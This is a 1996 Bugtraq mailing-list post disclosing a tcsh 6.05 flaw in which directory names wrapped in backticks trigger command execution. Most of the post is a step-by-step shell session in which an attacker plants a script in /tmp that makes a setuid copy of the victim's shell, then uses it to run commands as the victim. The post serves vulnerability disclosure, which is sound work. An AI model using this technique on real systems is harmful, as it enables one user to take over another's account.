Bugtraq mailing list archives
tee see shell problems
From: butafuco () mc net (test)
Date: Fri, 13 Sep 1996 09:03:00 -0500
A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed out with BSDI anyway.) that allows the execution of arbitrary commands when changing into directories that are enclosed with back tic's. The problem might also prove to be quite bad to tcsh scripts that find themselves changing into directories on the fly. Here is probably one of the dumbest methods possible that could be used to exploit this weakness. ----------------------------Cut to Bad guy-------------------------------- jim% whoami Evol bad guy jim% mkdir /tmp/\`source\ .WaReZ\` jim% echo echo #\\\!/bin/sh \> .\$\$ > /tmp/*W*/.WaReZ jim% echo echo sh \> .\$\$ >> /tmp/*W*/.WaReZ jim% echo chmod 4755 .\$\$ >> /tmp/*W*/.WaReZ jim% chmod +x /tmp/*W*/.WaReZ ---------------------------Cut to unsuspecting foo------------------------ jim% whoami Unsuspecting foo jim% echo $SHELL /bin/tcsh jim% I just like to check that sometimes. jim% Hey, I'm bored maybe I'll check /tmp for some neato stuff jim% cd /tmp jim% ls `source .WaReZ` jim% OH BOY!!! the jack pot! jim% cd *WaReZ* jim% ls jim% oh, oh well maybe I'll check later... jim% cd $HOME ----------------------------Cut to More Bad guy-------------------------- jim% ls -a /tmp/*W*/ . .. .24753 jim% /tmp/*W*/.24753 $whoami unsuspecting foo $ hah. ---------------------------End Unix Parable-------------------------------
Current thread:
- tee see shell problems test (Sep 13)
- <Possible follow-ups>
- Re: tee see shell problems David S. Goldberg (Sep 16)
- Re: tee see shell problems Alan Cox (Sep 17)
- Re: tee see shell problems Oleg Girko (Sep 17)
- Re: tee see shell problems Paul Szabo (Sep 17)